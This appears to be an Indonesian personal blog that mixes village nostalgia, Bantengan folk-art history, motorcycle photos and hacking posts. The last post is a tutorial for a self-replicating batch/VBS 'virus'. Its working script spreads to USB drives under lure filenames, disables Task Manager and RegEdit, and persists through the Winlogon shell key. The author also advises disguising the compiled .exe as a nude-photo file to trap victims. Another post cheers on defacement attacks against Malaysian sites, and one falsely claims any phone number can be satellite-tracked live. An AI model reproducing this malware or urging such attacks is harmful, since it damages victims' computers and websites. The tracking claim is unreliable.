Desa ku yg Kucinta

Begini dah kalo abis pulang kampung. Berat banget ninggalin yg namanya kota Trawas.
semua bilang, "Ngapaen kerja jauh-jauh, mending di sini lebih seneng". sekolahan belum di urus, buku kenangan blon di ambil. wih...
tp klo di pikir" sih sulit banget cari kerja di jawa. persaingan sungguh" ketat. dari pada nganggur di rumah yah sudahlah berangkat...

berbangga lah kalian telah memiliki alam yg dingin nan indah.
walo bukan jepretan sendiri nih...



















Siapa nih jepret bagus banget.
jadi pengen muncak.... :p

Read more »

Kesenian Bantengan

Lahirnya kesenian bantengan ada dua versi:

a.Berasal dari Batu

b. Berasal dari Cleket (Made) dan berkembang pesat di Pacet

· Berasal dari kota Batu. Menurut catatan yang bersifat dari mulut ke mulut dimulai dari seorang yang berasal dari Batu ada seorang pendekar membawa kesenian ini dan bergabung dengan Saman (kelompok Siliwangi) dari Pacet dan berkembang di Pacet sampai sekarang ini.

· b.Berasal dari Pacet. Menurut cerita dari orang orang, yang menghidupkan kesenian Bantengan ini sampai sekarang di Claket. Akhirnya kesenian ini hidup subur sampai sekarang di Pacet dan Claket



Kedua versi itu sulit dilacak kebenarannya, mana yang lahir lebih dulu. Tetapi jelas sekali tempat yang terus melestarikan kesenian Bantengan ini adalah Pacet (sering mengadakan Festival Bantengan dan upacara tetap setiap memperingati hari kemerdekaan RI), cara swasembada layaknya kesenian tradisional lainnya di Indonesia.
Kedua versi itu masuk akal kalau dihubungkan dengan geografi kedua kawasan itu. masih banyak terdiri dari hutan belantara dan gunung. Sudah tentu Bantengan itu identik dengan hutan.

Menurut cerita salah satu tokoh Bantengan dan beberapa tokoh bantengan yang lain, seni Bantengan ini asal mulanya dari seni persilatan yang tumbuh subur di surau-surau atau langgar (mushollah).

Kesenian Bantengan ini awalnya untuk beladiri bagi pemuda di surau-surau. Tetapi akhirnya menjadi kegiatan seni untuk merayakan upacara perkimpoian, sunatan atau bersih desa.

Pemikiran manusia terus berkembang, begitu juga perkembangan kesenian termasuk seni “Kitch” atau seni bawah/ tradisional.

Seni yang hidup turun temurun dari rakyat. Pencak silat itu akhirnya tidak banyak diminati masyarakat luas karena membosankan dan tidak menarik lagi.

Para pendekar mencari alternatif lain agar kesenian itu diminati lagi. Begitu sederhana sekali perjalanan kesenian Bantengan ini.

Suatu ketika seseorang dari Claket itu menemukan bangkai banteng yang tergeletak di tepi sungai Kromong tepi hutan. Konon kabarnya ini terjadi karena perkelahian dua ekor banteng. Seekor kalah dan mati menjadi bangkai. Supaya tidak mubazir oleh orang terserbut bangkai banteng ini diambil khusus kepalanya (tengkoraknya) dibersihkan dan dibawa pulang.
Kalau kepala menjangan untuk hiasan rumah, sampai sekarang masih banyak terdapat di rumah-rumah lama sebagai lambang atau simbol keberadaan seseorang, tetapi tengkorak banteng yang berkesan gagah dan berwibawa ini mengilhami orang tersebut untuk melengkapi kesenian Bantengan yang tidak menarik lagi. Awalnya tengkorak itulah yang langsung diambil untuk dipakai sebagai “topeng” Bantengan itu melengkapi seni pencak silat dan akhirnya karena menarik, hanya Bantengan saja yang lestari sampai sekarang. Bantengan berdiri sendiri tanpa pencak silat lagi.

Akhirnya Bantengan ini menjadi cabang seni rakyat atau tradisional yang amat digemari masyarakat, meskipun sampai sekarang Pemerintah Kabupaten Mojokerto sendiri belum pernah ada usaha untuk mengangkat seni rakyat ini menjadi sebuah kebanggaan yang akhirnya bisa menjadi ikon untuk Kabupaten Mojokerto.

Mereka hidup sendiri dan ini perlu ditangani secara lebih serius agar tidak tertatih-tatih berjalan sendiri tanpa penanganan yang jelas meskipun diam-diam ia telah mengangkat citra sebuah kota dalam bidang kesenian dan kebudayaan. Barangkali ini sebuah landasan pemikiran tentang sebuah IKON.


Bantengan Masa Sekarang

Group Bantengan di Kabupaten Mojokerto awalnya banyak sekali. Menurut catatan, dulu sampai sekarang ke daerah Gondang, Kutorejo dan Tlagan. Bahkan menurut berita dari mulut ke mulut ada juga yang masih hidup di daerah Pandan dan Wonosalam serta di kota kecil Dinoyo. Tetapi yang jalan sampai sekarang hanya Kec. Pacet dan Claket saja. Tak salah kalau banyak orang yang mengatakan bahwa Bantengan kesenian milik Pacet. Atau saling berebut antara kota Batu dan Pacet mana yang lebih dulu melahirkan Bantengan ini tetapi ini sulit dilacak kebenarannya. Mengapa demikian?

Barangkali memang benar kesenian ini dari sana dan secara geografis (Batu dan Pacet) masyarakatnya amat mendukung, hutan dan gunung. Masyarakat Pacet dan Claket memang merasa memiliki seni ini turun temurun yang di “leluri” sebagai penghargaan kepada penemu atau pencipta serta penerus sini Bantengan ini.

Akhirnya topeng Bantengan yang awalnya dari tengkorak banteng asli diganti dengan topeng buatan yang dibuat dari kayu. Ditakutkan akan terjadi perburuan liar untuk menembak banteng, meskipun akhirnya banteng itu punah dengan sendirinya.

Seni Bantengan ini terdiri dari dua pemain yang berperan menjadi seekor banteng. Pemain depan dengan dua laki-laki bertugas menjadi dua kaki banteng di depan, dan kaki milik pemain yang lain bertugas sebagai dua kaki banteng bagian belakang. Tubuh banteng dibentuk dari selembar kain hitam yang menghubungkan kepala banteng dengan ekor banteng yang dimainkan oleh pemain yang di belakang

Read more »

Tool Umum Hacker

Terdapat 10 tools favorit yang mendapat suara terbanyak sepanjang tahun 2006. Tool tersebut merupakan senjata yang dianggap mutlak diperlukan dalam aktivitas hacking dan sekuriti.

1.Nessus

“Nessus” pertama kali dibuat oleh Renaud Deraison pada tahun 1998 dan disebarkan untuk komunitas internet secara bebas, bermanfaat, ter-update dengan baik serta mudah untuk digunakan.

Nessus adalah sebuah program untuk mencari kelemahan pada sebuah sistem komputer. Menurut situs resminya di www.nessus.org, tool ini telah digunakan oleh lebih dari 75.000 organisasi dan perusahaan di seluruh dunia.

2.Snort

Snort adalah sebuah IDS, yaitu tool untuk mencegah dan mendeteksi serangan terhadap sistem komputer. Vendor dari snort mengklaim bahwa tool ini telah didownload berjuta-juta kali dari situs mereka. Anda mungkin berminat untuk mencobanya, silahkan download tool ini di www.snort.org.

3.Kismet

Kismet adalah sebuah tool untuk mendeteksi koneksi wireless(mendukung lalu lintas 802.11b, 802.11a, dan 802.11g ) , menangkap paket dalam sebuah sistem jaringan dan menjadi sebuah IDS (intrusion detection System).

Untuk mencari tahu lebih lanjut mengenai kismet, anda dapat mengunjungi situs http://www.kismetwireless.net atau masuk ke #kismet irc.freenode.net.

4.Metasploit Framework

Metasploit Framework adalah sebuah proyek open source untuk mengembangkan, menguji dan menggunakan kode eksploit. Dibuat dengan bahasa Perl sebagai fondasi dasar dan dan terdiri dari komponen pelengkap yang telah dicompile dengan bahasa C, assembler dan Python. Metasploit Framework dapat berjalan pada sistem operasi UNIX, Linux dan Windows. Keterangan yang lebih detail dapat anda cari di http://www.metasploit.com.

5.Netcat

Netcat adalah sebuah tool networking utility yang dapat membaca dan menulis data pada koneksi sebuah jaringan melalui protokol TCP/IP.

Fitur yang terdapat pada Netcat antara lain :

• Koneksi keluar dan masuk melalui protokol UDP ataupun TCP dengan port yang digunakan..

• Tunneling mode, tunneling dari UDP ke TCP, memetakan parameter dalam jaringan (source port/interface, listening port/interface, dan mengijinkan remote host melakukan koneksi ke tunnel)

• Port scanner, untuk mendeteksi port yang terbuka.

• Buffered send-mode dan hexdump RFC854 telnet.

6.Hping

Hping merupakan sebuah tool serba guna. Tool ini dapat digunakan untuk menguji kemampuan firewall, mencari port yang terbuka, menguji keamanan jaringan dengan menggunakan berbagai jenis protokol, mendapatkan informasi sistem operasi, mengevaluasi protokol TCP/IP.

7.TCPDump

Tcpdump juga merupakan sebuah sniffer. Admin jaringan menggunakan tool ini untuk memonitor lalu lintas dan menganalisa permasalahan jika terjadi gangguan. Menurut informasi di http://www-iepm.slac.stanford.edu/monitoring/passive/tcpdump.html , Tcpdump menggunakan paket filter dari UNIX BSD untuk meng-capture data(BPF / BSD Packet Filter).BPF menerima salinan dari driver pengirim dan penerima paket.Pengguna tcpdump juga dapat menyaring paket sesuai dengan keinginan.

8. John The Ripper

Sebuah password cracker dari jaman nenek moyang para hacker yang masih menjadi 10 besar tool favorit. Berikut adalah keterangan dari pembuat John The Ripper.

“John the Ripper is a password cracker, currently available for UNIX, DOS,WinNT/Win95. Its primary purpose is to detect weak UNIX passwords. It has been tested with Linux x86/Alpha/SPARC, FreeBSD x86, OpenBSD x86, Solaris 2.x SPARC and x86, Digital UNIX, AIX, HP-UX, and IRIX”.

9. Cain And Abel

Cain & Abel adalah sebuah tool untuk masalah password. Tool ini dapat mengumpulkan password dengan metode network sniffing, meng-crack password menggunakan Dictionary attack, Brute-Force and Cryptanalysis attacks, merekam pembicaraan VoIP (Voice Over Internet Protocol), meng-crack jaringan wireless, menganalisa trafik dalam jaringan. www.oxid.it

10. WireShark / Ethereal

Wireshark / Ethereal adalah sebuah tool untuk menganalisa protokol jaringan. Fungsinya juga sebagai sebuah sniffer. Memantau lalu lintas internet. Wireshark

dapat berjalan pada Windows, MAC OS X, dan Linux.

Read more »

Cara Kerja Virus

Secara umum, cara kerja virus sebagai berikut:
File bersih:
!--F1--!--------F2-------!
Virus:
!--V2--!--------V2-------!
Setelah terinfeksi virus, file bersih akan menjadi seperti ini:
kemungkinan 1à !--V1--!-------F2--------!
atau seperti ini:
kemungkinan 2à !--V1--!--------F2-------!--------V2------!

Pada cara pertama yakni !--V1--!-------F2--------! , dianggap lebih profesional. Ukuran file setelah tertular bisa dibuat tidak berubah. Hanya dengan menyisipkan kepala virus saja (bisanya besarnya hanya 3 byte) ke file yang dijalankan akan ditularkan. Kepala virus berisi informasi tentang tanda pengenal virus (ukuran 1 Byte) dan perintah untuk membelokkan kerja file ke rutin/badan virus. Badan virus itu sendiri biasanya di simpan di memori, boot sector, atau hardisk. Sedangkan pada cara yang ke dua, jelas terlihat bahwa ukuran file yang terinfeksi akan menjadi lebih besar dari sebelumnya. Ukuran file akan bertambah besar sebesar ukuran virus.

Sumber :

http://finderonly.com/2008/11/13/cara-kerja-virus-komputer-menurut-jenisnya/

http://my.opera.com/roismahmud/blog/mengintip-sedikit-cara-kerja-virus-komputer

http://www.diskusiweb.com/viewthread.php?tid=9855&page=1

http://roemahku.wordpress.com/2008/06/24/memahami-cara-kerja-virus-komputer/

http://purnama-yasa.blogspot.com/2007/11/cara-kerja-berbagai-jenis-virus.html

Read more »

Belajar Photogafri

Karna kemaren telah melihat foto" kakak pas SMA.
munculah inspirasi untuk membuat foto jaman 90'an.
walo ekspresi bukan seorang model.
dan bermodal kamera HP...


Tolong kasih saran gan..

Read more »

Perang Cyber INDONESIA Vs m.ALAY.sia

Kita tw bahwa Indonesia dan malaysia lagie panas"nya. Tertambah karna ulah suporter malaysia yg tidak menujukkan sportifitanya. Ayo hacker indonesia, perang cyber blm berakhir.
setelah dulu dedemit maya yang mengaku dari Indonesia meluncurkan serangan pada situs internet milik warga Malaysia. situs yang dikelola oleh perguruan tinggi yang cukup terkenal di negera tetangga kita ini, yakni Universiti Utara Malaysia (UUM).

Sepertinya aksi ini dipicu oleh kekesalan para cracker yang menilai Malaysia terus berulah merongrong kedaulatan negara Indonesia. Hal ini tampak pada pesan yang ditampilkan di situs tersebut:

“Rakyat Indonesia cinta damai, tapi kalau terus-terusan diusik dan dilecehkan kami juga bisa marah, sabar ada batasnya. Pulau Sipadan dan Ligitan sudah diambil, sekarang mau mencaplok blok Ambalat, Saudara Kami yang ada di sana Dengan Kejinya Kalian Siksa tanpa Rasa kemanusiaan..!! Ini adalah peringatan dari kami, Jika kalian terus mengusik kami, maka akan kami lanjutkan perjuangan ini dengan cara kami sendiri..!,”

Tidak jelas siapa sebenarnya yang berada di balik aksi serangan cyber ini. Pelaku hanya memakai identitas bernama the_g3mb3L pada halaman situs yang telah diserang. Namun ada baiknya, kita semua tetap berkepala dingin agar tidak terpancing provokasi yang bisa merugikan banyak pihak.

Baru-Baru ini Situs pemerintahan Indonesia telah di hack oleh hacker yang mengaku dirinya dari negara Malaysia dan China. Namun sekarang situs hack yang diiringi lagu dari kelompok musik ERA itu telah diambil alih lagi oleh hacker indonesia http://www.lampungtengah.go.id/ . Screen shot situs Indonesia yang telah dihack oleh mereka di 07 Juni 2010 sekitar jam 10 malam.

Situs yang telah dihack itu berpesan :

• We already very patient to indonesia hacker
• Do you remember? May 28?.
• Indonesia's military invasion of Malaysia News!
  
• Today we fought back to lead a coalition operation!
  
• BY: China / Malaysia Hacker Union
• China and Malaysia, we will give network security!!!
• And please dont ever try to hack malaysia/china website again!!!
  We will continue to revenge!

Pernyataan itu dibalas oleh hacker Indonesia. Mereka menyerang situs pemerintahan malaysia http://hoshas.moh.gov.my/ diiringi lagu kebangsaan Indonesia. Screen shot situs pemerintahan Malaysia yang telah dihack :



Pesan dari hacker Indonesia :

• We already very patient to indonesia hacker ->Indonesian patient with Malaysia that stole the culture of INDONESIA
• Do you remember? May 28?. ->yes it was the day that showed his prowess INDONESIA HACKER
• Indonesia's military invasion of Malaysia News! ->ASSHOLE UR POLITIC
• Today we fought back to lead a coalition operation! ->CHINA you have supported state cultural thief !FVCK
  
• BY: China / Malaysia Hacker Union ->ASSHOLE UR THINKING MALAYSIA HACKER
• China and Malaysia, we will give network security!!! ->YEAH PEOPLE MALAYSIA LOW SECURITY
• And please dont ever try to hack malaysia/china website again!!! ->you do not touch, we did not touch
  This is code defacement of our site that has been damaged by the China / Malaysia
  We will continue to revenge! ->HOLLYSHIT !

Ayo...
Besiaplah menggempur m.ALAY.sia.
wkakakaka :D

Read more »

Melacak No HP Lewat GPS

Penasaran gag kalian ingin tw keberadaan seseorang lewat gprs...
disini kita bisa tw dmna no hp itu berada!!!
Tentu sangat brmanfaat jika ada kejadian hp ilang ato jatuh,
Bisa langsung dilacak lewat sini.

Tapi ingat!!!gunakan sebijaksana mungkin lho...
wkwkwk

Caranya adalah sbb :

Browsing ke: http://www.sat-gps-locate.com , lalu pilih
Negara mana yg akan dicari.

Masukkan no HP yg akan anda cari (misal No. 0816
1234567 masukkan 816 1234567)

Tunggu 1 menit, satellite akan melacak dimana posisi
dan kondisi pemegang HP secara “live”

SELAMAT MENCOBA !!!

Read more »

Kenalan sama Regedit

Registry Windows merupakan satu set file yangbe risikan database informasi dan dipakai untuk membatu Windows dalam melakukan pengontrolan perangkat keras, perangkat lunak, lingkungan pemakai dan interface. Registry juga dikembangkan sebagai suatu file referensi untuk asosiasi file data ke aplikasi. Sebenamya terdapat beberapa buah file yang digunakan untuk mengatur konfigurasi Windows seperti Win.ini, System.ini, Boot.ini dan sebagai nya. Tetapi karena keterbatasan file-file tersebut dalam melakukan manipulasi, dibuatlah data-base dan terregistrasi secara OLE dan beberapa file INI untuk dapat melakukan pengaturan system secara lebih lengkap.
Untuk menjalankan Registry, gunakan [Start > Run…] ketik [Regedit] lalu [Ok]

Terdapat lima pengelompokan registry seperti berikut:
• HKEY_CLASSES_ROOT
Merupakan tempat penyimpanan asosiasi file dan tempat dimana Windows akan mencari folder khusus yang bertipe Classes sebagai kelas-kelas yang dipakai sistem operasi secara global.

• HKEY_LOCAL_MACHINE.
Bagian ini menyimpan setting global (non user spesific) dari komputer yang sedang digunakan. Setting ini berhubungan dengan perangkat keras, perangkat lunak dan perangkat komunikasi. Contoh proses yang bisa dilakukan pada bagian ini misalnya pengaturan startup program, loading driver-driver hardware, remote connection, DNS Client, manajemen memory dan sebagainya.

• HKEY_CURRENT_USER.
Bagian ini merupakan penyimpanan setting personal untuksetiap user yang menggunakan komputer. Beberapa yang bisa dilakukan pada bagian ini misalnya untuk melakukan pengaturan menu, desktop, kualitas warna, wallpaper, taskbar dan sebagainya.

• HKEY_USERS.
Bagian ini menyimpan setting spesitik atau pengaturan tertentu yang dilakukan oleh pemakai komputer seperti misalnya layout desktop dan pengaturan program aplikasi. Jadi bagian ini menyimpan kunci indukyang temubung dengan pengaturan yangdilakukan setiap user yang berbeda.

• HKEY_CURRENT_CONFIG.
Menyimpan informasi dari profil perangkat keras yang terpasang. Isinya sebenarnya sama dengan Hkey_Local_MachineConfig.

Pengenalan nama-nama bagian dari dpat dijelaskan seperti berikut ;

1. Secara garis besar kolom registry terbagi dua yang dibatasi oleh sebuah garis tebal vertical, yaitu kelompok kiri merupakan kelompok KEY dan kelompok kanan merupakan kelompok yang disebut VALUE.
2. Ikon paling kiri (mirip folder) disebut KEY yang diikuti nama key yang bersangkutan mis ; HKEY_CURRENT_USER
3. Didalam sebuah ikon key masih ada lagi ikon yang disebut sub key begitulah seterusnya. Artinya semua ikon didalam ikon setelah ikon key disebut sub key
4. Kelompok VALUE terbagi atas tiga kolom.
5. Kelompok dibawah [Name] adalah nama Value
6. Kelompok dibawah [Type] adalah tipe Value
7. Kelompok dibawah data adalah nilai Value. Nilai inilah yang dapat kita manipulasi untuk melakukan setting tertentu pada system Windows.

Read more »

boret

BORET adalah singkatan dari Bonang Racing Team.
Berdiri di tahun 19xx. berawal dari anak-anak yg suka bongkar mesin motor.
dikarnakan tak tau seberapa cepat motor yg di utak-atik.
anak-anak bangsa ini mengadakan balapan kecil-kecilan.

Bapak Polisi sih melarang karna alasan keamanan. tapi alasannya ngak realis bagi anak-anak muda.
coba aja di berikan izin tempat khusus untuk setting motor mereka.
gak bakalan ada dah sembunyi-sembunyi.
ini juga olahraga, sekaligus engembangan bakat.

Sekarang pun nama BORET semakin melambung.
(walaupun kawasan pandaan-trawas wkwkwkw)
Hingga lahirlah motor-motor yg, yah lumayan lah bagi kantong" anak muda.




Photo-photo nya nih....








Boz kita nih...
Bang "Bonang"
wkakaka

Si Ijo

Bore up tigy
Stroke zr
pengapian Rextor Ekstrim
dll








Si Merah nih...

Bore up tigy
Rasio standart
Klep GL
dll













Supra Fu

Motor bpk...
Dilarang Koment!!!
wkakak









Bagi para crew yg motornya blm tercantum.
hub. saia!!! wkwkwkaka

Read more »

Turitorial Menbuat File .BAT menjadi .EXE

Dengan hampir membaca semua artikel yang berhubungan dengan registry dan virus, atas nama logika yang saya punya, saya berhasil membuat sebuah program yang menurut saia layak disebut sebagai virus, walaupun masih virus-virusan.

Kenapa saia pede sekali dengan menyebut program ini sebagai virus? Karna program yang saya buat dengan mengunakan software QuickBFC ini, bisa membelah diri (apabila dieksekusi)-bukankah salah satu ciri dari virus adalah dapat menggandakan diri- dan program ini juga masih sanggup untuk menyebar ke flashdisk(atau memory card) yang terdefault ke drive F:\. Jelas layak kan program yang satu ini di sebut sebagai virus(-virusan). Dan program ini juga tidak akan merusak file ataupun menghapusnya, Cuma buat iseng doang ko, cuma main-main diregistry.

Oke, karna saya rasa basa-basinya udah kebanyakan mari kita mulai.
Tapi sebelumnya saya mau mengucapkan terimakasih dulu buat si tomPLIX yang udah nulis artikel “Bikin Virus Dengan Perintah CMD”, karna program ini adalah pemikiran lanjutan setelah saya baca artikel itu. Dan juga tidak lupa rasa termakasih yang sebesar besarnya buat mas Wardana, R, S. yang udah ngenalin saya dengan pemrograman lewat bukunya; “Pemrograman Virus dan Spyware (uncensored)”, diterbitkan oleh jasakom.

Oke di mulai dari apa yang dibutuhkan. Yang dibutuhkan adalah :

1. Software Quick Batch File Compiler (Quickbfc) www.abyssmedia.com

(apa gunanya..?: software ini bisa menjadikan file .bat menjadi file .exe (executable). Karna virus yang akan kita buat ini bekerja dengan perintah CMD. Dan ada satu kegunaan software ini lagi, yaitu menyembunyikan jendela console. Jadi file .exe yang dibuat, ketika di run(jalankan) tidak menampilkan jendela console tapi tetap bekerja!! Hebat kan neh software.
2. Software Icon Changer

(apa gunanya???: lo ga mau kan virus buatan lo udah di apus duluan karna iconnya aneh dan mencurigakan. Nah, Icon Changer ini diperlukan untuk mencari Icon yang dimiliki oleh Windows, downloadnya di www.shelllabs.com .
3. Kemauan untuk memahami perintah-perintah CMD, Visual Basic Script (VBS) dan ga takut bermain di RegEdit.

Oke, semua udah siap. Mari dimulai, jalan kan software Quick bfc, lalu ketik script dibawah ini:
1. @echo off
2. If exist c:\windows\exploler.exe Goto lanjut
3. for %%a in (*.exe) do if %%~za equ 123456 copy "%%a" %systemroot%\exploler.exe
4. copy c:\windows\exploler.exe c:\”rahasia gua”.exe
5. echo on error resume next>c:\windows\gila.vbs
6. echo Dim WshShell, f1, fso, f2>>c:\windows\gila.vbs
7. echo set WshShell = CreateObject("Wscript.Shell")>>c:\windows\gila.vbs
8. echo set fso = CreateObject("Scripting.FileSystemObject")>>c:\windows\gila.vbs
9. echo set f1 = fso.GetFile("C:\WINDOWS\exploler.exe")>>c:\windows\gila.vbs
10. echo set f2=fsoGetFile(“C:\windows\gila.vbs”)>>c:\windows\gila.vbs
11. echo f1.Attributes = "3">>c:\windows\gila.vbs
12. echo f2.Attributes =”3”>>c:\windows\gila.vbs
13. echo WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD">>c:\windows\gila.vbs
14. echo WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives", "29", "REG_DWORD">>c:\windows\gila.vbs
15. echo WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive", "29", "REG_DWORD">>c:\windows\gila.vbs
16. echo WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system\DisableRegistryTools", "1", "REG_DWORD">>c:\windows\gila.vbs
17. echo WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD">>c:\windows\gila.vbs
18. echo WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD">>c:\windows\gila.vbs
19. echo WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system\DisableTaskMgr", "1", "REG_DWORD">>c:\windows\gila.vbs
20. echo WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page", "http://fanaticanz.blogspot.com", "REG_SZ">>c:\windows\gila.vbs
21. echo WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell", "Explorer.exe C:\WINDOWS\exploler.exe", "REG_SZ">>c:\windows\gila.vbs
22. echo WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization", "rastaman", "REG_SZ">>c:\windows\gila.vbs
23. echo WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner", "fanatiCanz", "REG_SZ">>c:\windows\gila.vbs
24.

25. :lanjut
26. call c:\windows\gila.vbs
27. if exist c:\legalin_ganja_dong_by_fanatiCanz.exe goto ceki
28. for /R c:\ %%d in (legalin_ganja_dong_by_fanatiCanz.exe) do copy c:\windows\exploler.exe "%%d"
29. Goto ceki
30.

31. :infek1
32. for %%a in (*.exe) do if %%~za equ 12345 copy "%%a" %systemroot%\exploler.exe
33. Goto ceki
34.

35. :infek2
36. Copy c:\windows\exploler.exe c:\”gambar lucu”.exe
37. Goto ceki
38.

39. :infek3
40. Copy c:\windows\exploler.exe f:\”koleksi kartun flash”.exe
41. Goto ceki
42.

43. ekf
44. if exist f:\”koleksi kartun flash”.exe Goto ceki
45. Goto infek3

46.


47. eki
48. if not exist c:\windows\exploler.exe Goto infek1
49. if not exist c:\”gambar lucu”.exe Goto infek2
50. if exist f:\ Goto cekf
51.

52. Goto ceki

Waaahhhh……… panjang ya?jangan bilang iya, soale mungkin nanti disaat menjadi programer betulan, 52 baris sih masih sangat amat enteng sekali!!! Mungkin nanti bakalan punya proyek yang jumlahnya ribuan atau mungkin puluhan ribu baris, jadi jangan menyerah Cuma karna 52 baris diatas.

Sebetulnya tanpa software quickbfc, masih bisa ko bikin virus(-virusan) ini dan script diatas ditulis dengan menggunakan notepad, lalu di simpan dengan ektensi-nya harus .bat. Dan emang kalo mau nyoba bikin pake notepad trus disimpen dengan ektensi .bat, ada perintah yang bisa diganti, yakni perintah baris ke-3 dan 33 yang “for %%a in dst….” Diganti jadi “copy %0 tujuan dan nama file nya”.

Tapi kan kalo nyebarin dengan ektensi .bat kan teramat mencurigakan, mendingan pake quickbfc lalu compile dengan ektensi .exe namanya terserah, contoh:cewe_telanjang.exe (icon nya juga yang sexi, biar lebih mantap), gua yakin para muka mesum akan langsung menjadi korban (heehehe)!!! Dan berdoalah semoga kompie calon korban ngga pake anti virus!.

Oke kalo kamu masih sanggup dan masih mau ngebaca tulisan ini, kamu bakalan dapet penjelasan dari script diatas!

Dan penjelasannya adalah:
Baris
1. Ini Cuma perintah dasar cmd yang tidak akan menampilkan perintah yang harusnya tertulis di console cmd. (dipikir-pikir ngapain juga yach? Kan ini adalah proyek ghost application! Tapi bodo ah!!)
2. Ini perintah untuk mengecek keberadaan file explorer.exe di drive c:\windows. Kalo udah ada kan berarti udah diinfek, dan akan langsung menuju parameter perintah lanjut, tapi kalo belum ada maka akan dilanjutkan ke baris selanjutnya.
3. perintah untuk menyalin program ini ke folder c:\windows dengan nama explorer.exe yang selanjutnya akan menjadi file induk program ini. Sebetulnya kalo dibikinnya pake notepad dan disimpan dengan ektensi .bat maka perintah “for %%a in (*.exe) do if %%~za equ 123456 copy "%%a" %systemroot%\exploler.exe” diganti jadi “copy %0”. Nah, kalo pake software Quickbfc perintah “copy %0” tidak berfungsi. (lengkapnya baca artikel siTomplix yang judulnya Bikin Virus Dengan Perintah CMD)
4. perintah untuk menyalin file explorer.exe di drive c:\windows\ ke drive c:\ dengan nama “rahasia gua.exe
5. perintah di baris ini sampai baris 23 adalah perintah yang menggunakan parameter > dan >> untuk membuat sebuah file Visual Basic Script yang bernama gila.vbs. Disinilah kesaktian program ini, kalau berhasil dieksekusi (kenapa kalau..? ya karna ada beberapa anti virus yang memblok akses ke registry –antivirus yang saya pake ANTIvir, file .vbs ini berjalan mulus –berarti sukses. Tetapi ketika saya coba pake xxxx ada warning dan mempertanyakan file itu boleh dieksekusi atau dihapus atau dikarantin-.

Sukur-sukur si calon korban ga make anti virus, tentram damai program ini jalan. Kenapa harus make file Visual Basic Script aja untuk entry ke registry? Jawabannya adalah file Visual Basic Script ini tidak hanya untuk mengisi registry saja. Ada satu lagi fungsi dari virus ini, yaitu mengganti attribute file explorer di drive c:\windows\ menjadi Hidden. Lagian juga kalo ngisi registry pake ektensi .reg bakalan ada pertanyaan “are you sure want to add the information in nama_file.reg to the registry?” ga efisien banget kan? Oke, kembali ke….? Registry. Dan registry yang di isi adalah :


1. Menghilangkan menu RUN
2. Menyembunyikan drive A, C, D dan E di windows explorer
3. Menyembunyikan semua file di drive A, C, D dan E windows explorer (bakalan ada pembatasan!)
4. Men-disable kan menu RegEdit
5. Menghilangkan menu Folder Option
6. Menghilangkan menu Search
7. Mendisable kan Task Manager (ctrl+alt+del tidak bisa digunakan)
8. Mengganti alamat default Internet Explorer menjadi http://fanaticanz.blogspot.com
9. Menjadikan file exploler.exe di drive c:\windows yang tadi disalin(copy) selalu dijalankan ketika computer di hidupkan lagi walaupun windows masuk ke dalam safe mode!
10. Entry yang ini bakalan merubah nama owner organitation(coba deh kalian klik kanan di my computer trus pilih properties, dan liat di situ ada tulisan "registered to:”) nah, entry yang satu ini akan merubah nama organization yang tadinya apapun menjadi “rastaman”
11. Sama, entry yang satu ini juga merubah nama owner (cek lagi aja di properties my computer) yang tadinya apapun menjadi “fanaticanz”

Puh.. selesai juga tentang Registry…. Masih mau lanjut???? lanjut mang……………
24. kosong
25. ini parameter yang membuat kumpulan perintah yang terdiri dari baris 26 – 28
26. ini perintah yang akan mengeksekusi file gila di folder c:\windows
27. ini perintah yang mempertanyakan keberadaan file legalin ganja dong by fanatiCanz.exe, jika ada maka akan langsung dirujuk menuju parameter perintah ceki
28. ini perintah untuk menggandakan file induk exploler.exe yang ada di drive C:\windows\ ke seluruh folder dan subfolder yang ada di drive c:\ dengan nama legalin_ganja_dong_by_fanatiCanz.exe ((((thank’s a lot for tomplix))))
29. ini perintah untuk langsung menuju parameter perintah ceki (baris 47)
30. kosong
31. ini parameter yang membuat kumpulan perintah bernama infek1 yang berisikan perintah dari baris 33 – 34
32. perintah ini untuk menyalin file program ini dan sedang dijalankan (eksekusi) ke folder c:\windows dengan nama exploler.exe
33. ini perintah yang merujuk langsung ke parameter perintah ceki
34. kosong (untuk mengakhiri kumpulan parameter yang sebelumnya dibuat)
35. parameter yang membuat kumpulan perintah bernama infek2 yang berisikan perintah dari baris 37 – 38.
36. ini perintah untuk menyalin file induk exploler.exe ke drive c:\ dengan nama gambar lucu.exe
37. ini perintah yang langsung merujuk ke perintah ceki
38. kosong (untuk mengakhiri kumpulan parameter yang sebelumnya dibuat)
39. ini parameter yang membuat kumpulan perintah bernama indek3 yang berisikan perintah dari baris 41 – 42
40. ini perintah untuk menyalin file induk exploler.exe ke drive f:\ dengan nama koleksi kartun flash.exe
41. ini perintah yang merujuk langsung ke parameter perintah ceki
42. kosong (untuk mengakhiri kumpulan parameter yang sebelumnya dibuat)
43. ini parameter yang membuat kumpulan perintah bernama cekf yang berisikan kumpulan perintah dari baris 45-46
44. ini perintah yang mempertanyakan keberadaan file koleksi kartun flash.exe di drive f:\. Jika tidak maka akan dilanjutkan ke parameter perintah infek3. Tapi jika file terebut sudah ada, itu berarti sudah diinfek maka akan dilanjutkan ke perintah pada baris selanjutnya.
45. ini perintah yang langsung merujuk kepada parameter perintah ceki
46. kosong (untuk mengakhiri kumpulan parameter yang sebelumnya dibuat)
